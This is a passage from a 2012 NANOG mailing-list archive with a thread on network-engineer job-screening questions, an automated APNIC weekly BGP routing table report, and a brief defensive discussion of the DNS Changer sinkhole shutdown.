>>>>> techinical interviewer will chech if the candidate understand the >>>>> differences of LSA 5 and 7. >>>> >>>> Frankly, this feels a bit like asking what the 9th byte in an IP >>>> header is used for (it's TTL, but who's, uh, counting?) 
-- "That's why >>>> God gave us packet analyzers" should be counted as an acceptable >>>> answer. If not, you'll find yourself skipping over plenty of >>>> extremely well qualified candidates in favor of those who have crammed >>>> recently for some sort of exam in hopes of compensating for their >>>> short CV. >>> >>> Ugh, I know someone (thankfully no longer a current colleague) who ardently >>> *defends* his use of questions like "what does the -M option to ps do?" on >>> the basis that "any senior person who knows what they're doing should know >>> all the options to ps!". No, you useless tit, anyone who knows what they're >>> doing should know how to read a bloody manpage. >>> >>> Trivia tests get you hiring people who know trivia. Knowing trivia has it's >>> productivity benefits, but if you can't apply it, it's useless. >>> >>> - Matt >>> >>> -- >>> Politics and religion are just like software and hardware. They all suck, >>> the documentation is provably incorrect, and all the vendors tell lies. >>> -- Andrew Dalgleish, in the Monastery >>> >>> >>> >> >> >> -- >> -Matt Chung > > > From kmedcalf at dessus.com Fri Jul 6 14:11:18 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Fri, 06 Jul 2012 13:11:18 -0600 Subject: job screening question In-Reply-To: <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> Message-ID: > "A client cannot access the website "http://xyz.com" >> How does the user know that it cannot access the web site? > When did users become things? > Probably a candidate that made this mistake should be dismissed from > consideration on that basis alone. How do you know that the client is a person? 
---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From cscora at apnic.net Fri Jul 6 14:09:20 2012
From: cscora at apnic.net (Routing Analysis Role Account)
Date: Sat, 7 Jul 2012 05:09:20 +1000 (EST)
Subject: Weekly Routing Table Report
Message-ID: <201207061909.q66J9Puj021411@thyme.rand.apnic.net>

This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan.

The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG, TRNOG, CaribNOG and the RIPE Routing Working Group.

Daily listings are sent to bgp-stats at lists.apnic.net

For historical data, please see http://thyme.rand.apnic.net.

If you have any comments please contact Philip Smith .

Routing Table Report   04:00 +10GMT Sat 07 Jul, 2012

Report Website:     http://thyme.rand.apnic.net
Detailed Analysis:  http://thyme.rand.apnic.net/current/

Analysis Summary
----------------

BGP routing table entries examined:                            416013
Prefixes after maximum aggregation:                            175712
Deaggregation factor:                                            2.37
Unique aggregates announced to Internet:                       202545
Total ASes present in the Internet Routing Table:               41442
Prefixes per ASN:                                               10.04
Origin-only ASes present in the Internet Routing Table:         33316
Origin ASes announcing only one prefix:                         15667
Transit ASes present in the Internet Routing Table:              5555
Transit-only ASes present in the Internet Routing Table:          133
Average AS path length visible in the Internet Routing Table:     4.5
Max AS path length visible:                                        27
Max AS path prepend of ASN ( 51742)                                24
Prefixes from unregistered ASNs in the Routing Table:             391
Unregistered ASNs in the Routing Table:                           124
Number of 32-bit ASNs allocated by the RIRs:                     2945
Number of 32-bit ASNs visible in the Routing Table:              2571
Prefixes from 32-bit ASNs in the Routing Table:                  6623
Special use prefixes present in the Routing Table:                  2
Prefixes being announced from unallocated address space:          166
Number of addresses announced to Internet:                 2562615596
    Equivalent to 152 /8s, 190 /16s and 105 /24s
Percentage of available address space announced:                 69.1
Percentage of allocated address space announced:                 69.2
Percentage of available address space allocated:                 99.9
Percentage of address space in use by end-sites:                 93.1
Total number of prefixes smaller than registry allocations:    144059

APNIC Region Analysis Summary
-----------------------------

Prefixes being announced by APNIC Region ASes:                 101846
Total APNIC prefixes after maximum aggregation:                 32701
APNIC Deaggregation factor:                                      3.11
Prefixes being announced from the APNIC address blocks:        102276
Unique aggregates announced from the APNIC address blocks:      42093
APNIC Region origin ASes present in the Internet Routing Table:  4713
APNIC Prefixes per ASN:                                         21.70
APNIC Region origin ASes announcing only one prefix:             1240
APNIC Region transit ASes present in the Internet Routing Table:  752
Average APNIC Region AS path length visible:                      4.6
Max APNIC Region AS path length visible:                           24
Number of APNIC region 32-bit ASNs visible in the Routing Table:  243
Number of APNIC addresses announced to Internet:            704055168
    Equivalent to 41 /8s, 247 /16s and 7 /24s
Percentage of available APNIC address space announced:           82.3

APNIC AS Blocks        4608-4864, 7467-7722, 9216-10239, 17408-18431
                       (pre-ERX allocations)
                       23552-24575, 37888-38911, 45056-46079, 55296-56319,
                       58368-59391, 131072-133119
APNIC Address Blocks   1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8,
                       59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8,
                       112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8,
                       120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8,
                       150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8,
                       202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8,
                       222/8, 223/8,

ARIN Region Analysis Summary
----------------------------

Prefixes being announced by ARIN Region ASes:                  152288
Total ARIN prefixes after maximum aggregation:                  77420
ARIN Deaggregation factor:                                       1.97
Prefixes being announced from the ARIN address blocks:         153251
Unique aggregates announced from the ARIN address blocks:       68354
ARIN Region origin ASes present in the Internet Routing Table:  15188
ARIN Prefixes per ASN:                                          10.09
ARIN Region origin ASes announcing only one prefix:              5754
ARIN Region transit ASes present in the Internet Routing Table:  1599
Average ARIN Region AS path length visible:                       4.0
Max ARIN Region AS path length visible:                            24
Number of ARIN region 32-bit ASNs visible in the Routing Table:    17
Number of ARIN addresses announced to Internet:            1070644608
    Equivalent to 63 /8s, 208 /16s and 189 /24s
Percentage of available ARIN address space announced:            56.6

ARIN AS Blocks         1-1876, 1902-2042, 2044-2046, 2048-2106
                       (pre-ERX allocations)
                       2138-2584, 2615-2772, 2823-2829, 2880-3153
                       3354-4607, 4865-5119, 5632-6655, 6912-7466
                       7723-8191, 10240-12287, 13312-15359, 16384-17407
                       18432-20479, 21504-23551, 25600-26591,
                       26624-27647, 29696-30719, 31744-33791
                       35840-36863, 39936-40959, 46080-47103
                       53248-55295, 393216-394239
ARIN Address Blocks    3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8,
                       15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8,
                       24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8,
                       38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8,
                       54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8,
                       68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8,
                       96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8,
                       128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8,
                       137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8,
                       147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8,
                       159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8,
                       168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8,
                       198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8,
                       214/8, 215/8, 216/8,

RIPE Region Analysis Summary
----------------------------

Prefixes being announced by RIPE Region ASes:                  103875
Total RIPE prefixes after maximum aggregation:                  55073
RIPE Deaggregation factor:                                       1.89
Prefixes being announced from the RIPE address blocks:         106098
Unique aggregates announced from the RIPE address blocks:       67054
RIPE Region origin ASes present in the Internet Routing Table:  16647
RIPE Prefixes per ASN:                                           6.37
RIPE Region origin ASes announcing only one prefix:              8073
RIPE Region transit ASes present in the Internet Routing Table:  2689
Average RIPE Region AS path length visible:                       5.0
Max RIPE Region AS path length visible:                            27
Number of RIPE region 32-bit ASNs visible in the Routing Table:  1694
Number of RIPE addresses announced to Internet:             635393668
    Equivalent to 37 /8s, 223 /16s and 86 /24s
Percentage of available RIPE address space announced:            92.4

RIPE AS Blocks         1877-1901, 2043, 2047, 2107-2136, 2585-2614
                       (pre-ERX allocations)
                       2773-2822, 2830-2879, 3154-3353, 5377-5631
                       6656-6911, 8192-9215, 12288-13311, 15360-16383
                       20480-21503, 24576-25599, 28672-29695
                       30720-31743, 33792-35839, 38912-39935
                       40960-45055, 47104-52223, 56320-58367
                       59392-61439, 196608-199679
RIPE Address Blocks    2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8,
                       77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8,
                       86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8,
                       95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8,
                       188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8,

LACNIC Region Analysis Summary
------------------------------

Prefixes being announced by LACNIC Region ASes:                 41993
Total LACNIC prefixes after maximum aggregation:                 8342
LACNIC Deaggregation factor:                                     5.03
Prefixes being announced from the LACNIC address blocks:        44613
Unique aggregates announced from the LACNIC address blocks:     21657
LACNIC Region origin ASes present in the Internet Routing Table: 1608
LACNIC Prefixes per ASN:                                        27.74
LACNIC Region origin ASes announcing only one prefix:             429
LACNIC Region transit ASes present in the Internet Routing Table: 310
Average LACNIC Region AS path length visible:                     4.6
Max LACNIC Region AS path length visible:                          25
Number of LACNIC region 32-bit ASNs visible in the Routing Table: 612
Number of LACNIC addresses announced to Internet:           111736744
    Equivalent to 6 /8s, 168 /16s and 247 /24s
Percentage of available LACNIC address space announced:          66.6

LACNIC AS Blocks       26592-26623, 27648-28671, 52224-53247, 262144-263167
                       plus ERX transfers
LACNIC Address Blocks  177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8,
                       191/8, 200/8, 201/8,

AfriNIC Region Analysis Summary
-------------------------------

Prefixes being announced by AfriNIC Region ASes:                 9191
Total AfriNIC prefixes after maximum aggregation:                2121
AfriNIC Deaggregation factor:                                    4.33
Prefixes being announced from the AfriNIC address blocks:        9609
Unique aggregates announced from the AfriNIC address blocks:     3242
AfriNIC Region origin ASes present in the Internet Routing Table: 548
AfriNIC Prefixes per ASN:                                       17.53
AfriNIC Region origin ASes announcing only one prefix:            171
AfriNIC Region transit ASes present in the Internet Routing Table: 124
Average AfriNIC Region AS path length visible:                    4.6
Max AfriNIC Region AS path length visible:                         25
Number of AfriNIC region 32-bit ASNs visible in the Routing Table:  5
Number of AfriNIC addresses announced to Internet:           40489728
    Equivalent to 2 /8s, 105 /16s and 211 /24s
Percentage of available AfriNIC address space announced:         40.2

AfriNIC AS Blocks      36864-37887, 327680-328703 & ERX transfers
AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8,

APNIC Region per AS prefix count summary
----------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
4766         2689      11116    1201  Korea Telecom (KIX)
17974        2146        558      79  PT TELEKOMUNIKASI INDONESIA
7545         1690        301      87  TPG Internet Pty Ltd
4755         1612        388     162  TATA Communications formerly
9829         1300       1085      28  BSNL National Internet Backbo
9583         1165         87     507  Sify Limited
7552         1124       1062      11  Vietel Corporation
4808         1100       2053     318  CNCGROUP IP network: China169
24560        1036        385     165  Bharti Airtel Ltd., Telemedia
9498          978        291      65  BHARTI Airtel Ltd.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC

ARIN Region per AS prefix count summary
---------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
6389         3392       3789     188  bellsouth.net, inc.
7029         3260        986     161  Windstream Communications Inc
18566        2089        382     182  Covad Communications
1785         1931        681     132  PaeTec Communications, Inc.
22773        1656       2911     121  Cox Communications, Inc.
20115        1651       1573     616  Charter Communications
4323         1575       1043     384  Time Warner Telecom
30036        1382        264     783  Mediacom Communications Corp
7018         1259      10029     824  AT&T WorldNet Services
11492        1190        216     356  Cable One

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN

RIPE Region per AS prefix count summary
---------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
8402         1628        544      16  Corbina telecom
2118         1288         97      14  EUnet/RELCOM Autonomous Syste
12479         781        731      91  Uni2 Autonomous System
34984         725        189     176  BILISIM TELEKOM
6830          711       2292     445  UPC Distribution Services
31148         695         37       9  FreeNet ISP
20940         685        220     527  Akamai Technologies European
8551          579        364      61  Bezeq International
13188         504        100      10  Educational Network
3320          496       8443     408  Deutsche Telekom AG

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE

LACNIC Region per AS prefix count summary
-----------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
28573        1989       1214      55  NET Servicos de Comunicao S.A
10620        1983        345     204  TVCABLE BOGOTA
6503         1531        418      66  AVANTEL, S.A.
8151         1489       3065     342  UniNet S.A. de C.V.
7303         1453        933     193  Telecom Argentina Stet-France
27947         709         74      94  Telconet S.A
11172         643         91      74  Servicios Alestra S.A de C.V
3816          589        246      90  Empresa Nacional de Telecomun
22047         583        326      15  VTR PUNTO NET S.A.
14117         567         65      59  Telefonica del Sur S.A.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC

AfriNIC Region per AS prefix count summary
------------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
8452         1222        958      13  TEDATA
24863         864        274      32  LINKdotNET AS number
6713          504        649      18  Itissalat Al-MAGHRIB
24835         286         80       8  RAYA Telecom - Egypt
3741          262        905     223  The Internet Solution
33776         199         12      21  Starcomms Nigeria Limited
12258         197         28      62  Vodacom Internet Company
16637         167        664      87  MTN Network Solutions
29975         167        571      19  Vodacom
15706         159         32       6  Sudatel Internet Exchange Aut

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC

Global Per AS prefix count summary
----------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
6389         3392       3789     188  bellsouth.net, inc.
7029         3260        986     161  Windstream Communications Inc
4766         2689      11116    1201  Korea Telecom (KIX)
17974        2146        558      79  PT TELEKOMUNIKASI INDONESIA
18566        2089        382     182  Covad Communications
28573        1989       1214      55  NET Servicos de Comunicao S.A
10620        1983        345     204  TVCABLE BOGOTA
1785         1931        681     132  PaeTec Communications, Inc.
7545         1690        301      87  TPG Internet Pty Ltd
22773        1656       2911     121  Cox Communications, Inc.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet

Global Per AS Maximum Aggr summary
----------------------------------

ASN    No of nets  Net Savings  Description
7029         3260         3099  Windstream Communications Inc
17974        2146         2067  PT TELEKOMUNIKASI INDONESIA
28573        1989         1934  NET Servicos de Comunicao S.A
18566        2089         1907  Covad Communications
1785         1931         1799  PaeTec Communications, Inc.
10620        1983         1779  TVCABLE BOGOTA
8402         1628         1612  Corbina telecom
7545         1690         1603  TPG Internet Pty Ltd
22773        1656         1535  Cox Communications, Inc.
4766         2689         1488  Korea Telecom (KIX)

Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet

List of Unregistered Origin ASNs (Global)
-----------------------------------------

Bad AS  Designation  Network           Transit AS  Description
15132   UNALLOCATED  12.9.150.0/24     7018        AT&T WorldNet Servic
25639   UNALLOCATED  12.41.169.0/24    7018        AT&T WorldNet Servic
13317   UNALLOCATED  12.44.10.0/24     7018        AT&T WorldNet Servic
23502   UNALLOCATED  12.44.44.0/24     7018        AT&T WorldNet Servic
17300   UNALLOCATED  12.45.103.0/24    7018        AT&T WorldNet Servic
17300   UNALLOCATED  12.45.110.0/24    701         UUNET Technologies,
16476   UNALLOCATED  12.46.27.0/24     7018        AT&T WorldNet Servic
14764   UNALLOCATED  12.108.237.0/24   7018        AT&T WorldNet Servic
33649   UNALLOCATED  12.111.112.0/24   19029       New Edge Networks
29760   UNALLOCATED  12.145.34.0/23    7018        AT&T WorldNet Servic

Complete listing at http://thyme.rand.apnic.net/current/data-badAS

Prefixes from private and non-routed address space (Global)
-----------------------------------------------------------

Prefix           Origin AS  Description
128.0.0.0/21     12654      RIPE NCC RIS Project
128.0.24.0/24    12654      RIPE NCC RIS Project

Complete listing at http://thyme.rand.apnic.net/current/data-dsua

Advertised Unallocated Addresses
--------------------------------

Network          Origin AS  Description
14.192.0.0/22    45464      Room 201, TGU Bldg
14.192.4.0/22    45464      Room 201, TGU Bldg
14.192.8.0/22    45464      Room 201, TGU Bldg
14.192.12.0/22   45464      Room 201, TGU Bldg
14.192.16.0/22   45464      Room 201, TGU Bldg
14.192.20.0/22   45464      Room 201, TGU Bldg
14.192.24.0/22   45464      Room 201, TGU Bldg
14.192.28.0/22   45464      Room 201, TGU Bldg
27.112.114.0/24  23884      Proimage Engineering and Comm
62.61.220.0/24   24974      Tachyon Europe BV - Wireless

Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA

Number of prefixes announced per prefix length (Global)
-------------------------------------------------------

/1:0   /2:0   /3:0   /4:0   /5:0   /6:0   /7:0   /8:19   /9:12   /10:28
/11:82   /12:236   /13:469   /14:841   /15:1521   /16:12308   /17:6376
/18:10769   /19:20908   /20:29682   /21:31424   /22:41182   /23:39084
/24:217243   /25:1224   /26:1473   /27:857   /28:169   /29:65   /30:18
/31:0   /32:23

Advertised prefixes smaller than registry allocations
-----------------------------------------------------

ASN    No of nets  Total ann.  Description
7029         2632        3260  Windstream Communications Inc
18566        2039        2089  Covad Communications
6389         1871        3392  bellsouth.net, inc.
8402         1323        1628  Corbina telecom
30036        1319        1382  Mediacom Communications Corp
11492        1153        1190  Cable One
22773        1087        1656  Cox Communications, Inc.
6503         1058        1531  AVANTEL, S.A.
1785         1042        1931  PaeTec Communications, Inc.
8452          998        1222  TEDATA

Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos

Number of /24s announced per /8 block (Global)
----------------------------------------------

1:574 2:735 3:1 4:13 5:131 6:3 8:433 12:2008
13:1 14:636 15:12 16:3 17:5 20:24 23:180 24:1776
27:1313 31:998 32:56 33:2 34:2 36:9 37:591 38:821
39:1 40:128 41:3062 42:142 44:3 46:1470 47:2 49:418
50:547 52:13 54:13 55:6 56:1 57:34 58:978 59:528
60:249 61:1297 62:967 63:2037 64:4257 65:2255 66:4486 67:2051
68:1154 69:3191 70:980 71:510 72:1837 74:2594 75:475 76:332
77:931 78:887 79:487 80:1213 81:947 82:660 83:529 84:494
85:1171 86:432 87:934 88:341 89:1749 90:301 91:5010 92:580
93:1360 94:1596 95:1220 96:379 97:318 98:889 99:39 100:19
101:253 103:1235 106:101 107:188 108:363 109:1428 110:785 111:940
112:420 113:634 114:653 115:904 116:930 117:729 118:926 119:1228
120:352 121:809 122:1674 123:1084 124:1397 125:1267 128:554 129:188
130:263 131:615 132:300 133:22 134:244 135:61 136:217 137:240
138:337 139:175 140:494 141:266 142:429 143:370 144:529 145:77
146:518 147:288 148:769 149:318 150:157 151:182 152:474 153:176
154:17 155:433 156:220 157:382 158:191 159:621 160:342 161:268
162:376 163:192 164:658 165:415 166:584 167:479 168:908 169:126
170:893 171:145 172:5 173:1730 174:617 175:438 176:564 177:924
178:1533 180:1290 181:99 182:1025 183:239 184:533 185:1 186:1918
187:1079 188:1355 189:1590 190:5739 192:6010 193:5521 194:4532 195:3430
196:1189 197:170 198:3673 199:4848 200:5911 201:1977 202:8701 203:8638
204:4325 205:2532 206:2800 207:2801 208:4028 209:3618 210:2780 211:1549
212:2003 213:1908 214:880 215:82 216:5071 217:1554 218:552 219:338
220:1237 221:568 222:337 223:357

End of report

From kmedcalf at dessus.com Fri Jul 6 14:16:18 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Fri, 06 Jul 2012 13:16:18 -0600
Subject: job screening question
In-Reply-To:
Message-ID: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com>

> > "A client cannot access the website "http://xyz.com"
>
> >> How does the user know that it cannot access the web site?
>
> > When did users become things?
>
> > Probably a candidate that made this mistake should be dismissed from
> > consideration on that basis alone.
>
> How do you know that the client is a person?

Perhaps "What language is the client written in, and what Operating System is it running on?" would be a better response.

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From tyler.haske at gmail.com Fri Jul 6 14:23:37 2012
From: tyler.haske at gmail.com (Tyler Haske)
Date: Fri, 6 Jul 2012 15:23:37 -0400
Subject: job screening question
In-Reply-To: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com>
References: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com>
Message-ID:

DNA; Homo sapiens.

Smart questions get smart answers.

If you want HR to test technical knowledge just make a multiple choice test. (Course then you open a new can of worms).

On Jul 6, 2012 3:16 PM, "Keith Medcalf" wrote:

>
> > > "A client cannot access the website "http://xyz.com"
> >
> > >> How does the user know that it cannot access the web site?
> >
> > > When did users become things?
> >
> > > Probably a candidate that made this mistake should be dismissed from
> > > consideration on that basis alone.
> >
> > How do you know that the client is a person?
> > Perhaps "What language is the client written in, and what Operating System is it running on?" would be a better response. > > --- > () ascii ribbon campaign against html e-mail > /\ www.asciiribbon.org > > > > From eesslinger at fpu-tn.com Fri Jul 6 14:25:07 2012 From: eesslinger at fpu-tn.com (Eric J Esslinger) Date: Fri, 6 Jul 2012 14:25:07 -0500 Subject: job screening question In-Reply-To: <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> References: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com>, <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> Message-ID: <2730A40A53ADE9418D5F58E734953DF42B014C4AE5@exchange.corp.fpu-tn.com> I've dealt with: 1, (yes, no comp, tablet, game console, or other device, other than non-internet capable HDTV. They had also just purchased our fastest service package. They got irate said were switching to our competitor, who were cheaper anyway. Good news for them, we don't do minimum service contracts. Bad news for them, the competitor does. ) 2, 3, 6, 7, 8 also 'user has no power but computer is on UPS or generator and network gear is not'. More than once in most cases. Lots and lots of laptops with wireless card switch flipped to off accidently. And while I've never had a user call because they are unable to access a website because they are dead, I have had a non-user call/email about receiving NDR emails regarding email boxes belonging to one of our users we removed after notification that the owner was deceased. That's happened a few times. My call on dealing with that was something along the lines of 'That email address has either been changed or the account associated with it disconnected, and we are not at liberty to discuss the issue further due to customer privacy policies' which is exactly what I say when the other possibilities are true. Actually I had something similar to 'the user is dead'. Guy calls in to complain his internet is down. We dig through our system, no record he's a customer. 
After lots of hemming and hawing, admits he leeches unsecured wireless connection off next door neighbor. Next door neighbor's next of kin just had cable/internet turned off as she passed away, left power on while the move stuff out of house, so wireless signal was still present. For a while I had 3 businesses in the same building that shared the same internet connection; However only one was listed on the account/paid the bill. Problem A) slow internet (metrics showing that their inbound or outbound is pegged, also the company paying bought the cheapest package available) Problem B) Cross business compromising of information, printing stuff in other offices (two of them were even direct competitors, effectivly) sharing drives across bussinesses, a virus outbreak that kept respreading through the network because one office didn't seem to care they had a worm, and C) company that owned/paid for connection had a tendancy to ignore late notices, because of billing schedule stuff the cutoff's would happen on Thursday, the person at that company with the authority to write checks only worked Mon-Wed ________________________________________ From: Owen DeLong [owen at delong.com] Sent: Friday, July 06, 2012 1:53 PM To: Keith Medcalf Cc: nanog at nanog.org Subject: Re: job screening question On Jul 6, 2012, at 11:41 AM, Keith Medcalf wrote: > > My response would be "insufficient information provided for meaningful diagnosis". > > The following could be issues: > ... the user does not have a computer > ... the computer is not turned on > ... the keyboard is not plugged in > ... the user is a quadraplegic and cannot use the mouse or keyboard > ... the user is blind and cannot find the computer > ... the user has a computer but is not connected to a network > ... the monitor is not turned on > ... the brightness is turned down too far on the monitor > ... 
the user is dead I would argue that the fact the user filed a ticket/contacted the helpdesk/whatever to raise the issue indicates that the user probably isn't dead. The rest are semi-legitimate somewhat amusing answers, but you missed many possibilities. When providing such a list of answers, always include an etc. at the end so as to indicate your understanding that the list is not complete. ;-) > How does the user know that it cannot access the web site? When did users become things? Probably a candidate that made this mistake should be dismissed from consideration on that basis alone. Owen > >> -----Original Message----- >> From: Matt Chung [mailto:itsmemattchung at gmail.com] >> Sent: Friday, 06 July, 2012 08:20 >> To: joseph.snyder at gmail.com >> Cc: nanog at nanog.org >> Subject: Re: job screening question >> >> A former manager of mine once told me you can gauge a persons understanding >> by the questions they ask and I personally agree with this statement. Most >> of us will be able to make a reasonable assessment of the person by >> listening to the content of their questions. I'm not looking for an >> immediate resolution, but trying to understand the thought process of the >> individual. I feel realistic scenarios provide some insight on the >> individual's analytical skills. >> >> "A client cannot access the website "http://xyz.com". What do you do to >> troubleshoot this issue?" >> >> Depending on the candidate, I've seen a variety of answers: >> 1) "Can you ping the device?" >> 2) "Can you access the gateway?" >> 3) "What does the running config look like on the router" >> 4) "Is there a firewall in between" >> >> I believe these questions may be asked in the right context provided there >> is enough information to isolate the issue to the network however the >> statement is devoid of anything useful that would make the network suspect. >> I would like to hear some questions such as: >> >> "are other websites accessible? 
>> Or is the only website the client is experiencing issues with?"
>> "was the website working previously? when did it start happening?"
>> "what does the client see on their screen? are they getting an error?"
>>
>> These questions reflect the person's ability to accurately understand the problem before deep diving into the technical details. From there, you can get more technical. "Client is receiving an HTTP 404 error." Great, rule out network since this is an application layer response...
>>
>> just my .02.
>>
>> On Fri, Jul 6, 2012 at 8:28 AM, wrote:
>>
>>> I agree. Let the person talk, do a few probing questions based off what they say. If you yourself have any value you should be able to tell if they have a chance.
>>>
>>> Also I would prefer someone who says I don't know for sure but maybe something along these lines, and then wants to know the right answer. Passion is also important; if you are willing to hire someone who is in it for just a paycheck, save yourself the headache and get a contractor.
>>> --
>>> Sent from my Android phone with K-9 Mail. Please excuse my brevity.
>>>
>>> Matthew Palmer wrote:
>>>
>>> On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote:
>>>> Diogo Montagner writes:
>>>>> For screening questions (for 1st level filtering), IMO, the questions have to be straight to the point, for example:
>>>>>
>>>>> 1) What is the LSA number for an external route in OSPF?
>>>>>
>>>>> This can have two answers: 5 or 7. So, I will accept if the candidate answers 5, 7 or 5 and 7. Later on (the next level of the interview), a technical interviewer will check if the candidate understands the differences of LSA 5 and 7.
>>>>
>>>> Frankly, this feels a bit like asking what the 9th byte in an IP header is used for (it's TTL, but who's, uh, counting?) -- "That's why God gave us packet analyzers" should be counted as an acceptable answer.
>>>> If not, you'll find yourself skipping over plenty of extremely well qualified candidates in favor of those who have crammed recently for some sort of exam in hopes of compensating for their short CV.
>>>
>>> Ugh, I know someone (thankfully no longer a current colleague) who ardently *defends* his use of questions like "what does the -M option to ps do?" on the basis that "any senior person who knows what they're doing should know all the options to ps!". No, you useless tit, anyone who knows what they're doing should know how to read a bloody manpage.
>>>
>>> Trivia tests get you hiring people who know trivia. Knowing trivia has its productivity benefits, but if you can't apply it, it's useless.
>>>
>>> - Matt
>>>
>>> --
>>> Politics and religion are just like software and hardware. They all suck, the documentation is provably incorrect, and all the vendors tell lies.
>>> -- Andrew Dalgleish, in the Monastery
>>>
>>
>> --
>> -Matt Chung
>
> This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited.

From surfer at mauigateway.com Fri Jul 6 14:53:59 2012
From: surfer at mauigateway.com (Scott Weeks)
Date: Fri, 6 Jul 2012 12:53:59 -0700
Subject: job screening question
Message-ID: <20120706125359.EEE0EE9F@m0005297.ppops.net>

--- don at bowenvale.co.nz wrote:
From: Don Gould

I have 25 years IT experience... I've applied for a few jobs in my time... I thought to myself "I'll have a crack with a few comments!!!"... ....then I read down the next 30 posts and decided that perhaps I didn't really know enough about networking to really comment...

But seriously guys, great thread with tons of really interesting stuff and a bunch of history.
---------------------------------------------------

Sure as heck had me going to search engines to make sure I knew the answers...
;-) And, yes, it was an interesting thread.

scott

From tomb at byrneit.net Fri Jul 6 14:58:44 2012
From: tomb at byrneit.net (Tomas L. Byrnes)
Date: Fri, 6 Jul 2012 12:58:44 -0700
Subject: DNS Changer items
In-Reply-To: <4FF72B49.2020302@gmail.com>
References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com>
Message-ID: <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org>

I think having the ISC DNS changer sinkhole servers return the DCWG check page IP for all queries would be a good final act.

> -----Original Message-----
> From: Andrew Fried [mailto:andrew.fried at gmail.com]
> Sent: Friday, July 06, 2012 11:16 AM
> To: Cameron Byrne
> Cc: nanog at nanog.org
> Subject: Re: DNS Changer items
>
> The DNS redirection began on November 8, 2011. The servers were instrumented to capture a very small portion of the dns data (source ip and port only) so that reports of infected users could be sent to the ISPs via reporting organizations like Shadowserver.
>
> Some ISPs did create walled gardens. Some merely redirected affected customers to their own internal DNS servers. Some ISPs did aggressive notifications to their users. And some ISPs did nothing.
>
> Sites were set up to allow users to check their systems (dns-ok.us, etc). The DCWG set up an information site to provide information on how to detect the DNSchanger infection and how to fix it. AV companies provided tools to help clean up systems, and the tools were published on the DCWG.org website.
>
> The FBI went to great lengths to get press coverage to get the word out.
>
> This operation has been ongoing for 7 months, 27 days and 14 hours.
>
> How much more of a graceful ramp down could there have been?
>
> Andy
>
> Andrew Fried
> andrew.fried at gmail.com
>
>
> On 7/6/12 1:52 PM, Cameron Byrne wrote:
> > So instead of turning the servers off, would it not have been helpful to have the servers return a "captive portal" type of response saying "hey, since you use this server, you are broken, go here to get fixed"
> >
> > Seems that would have been a more graceful ramp down.
> >
> > CB
> >
>

From tomb at byrneit.net Fri Jul 6 14:59:54 2012
From: tomb at byrneit.net (Tomas L. Byrnes)
Date: Fri, 6 Jul 2012 12:59:54 -0700
Subject: DNS Changer items
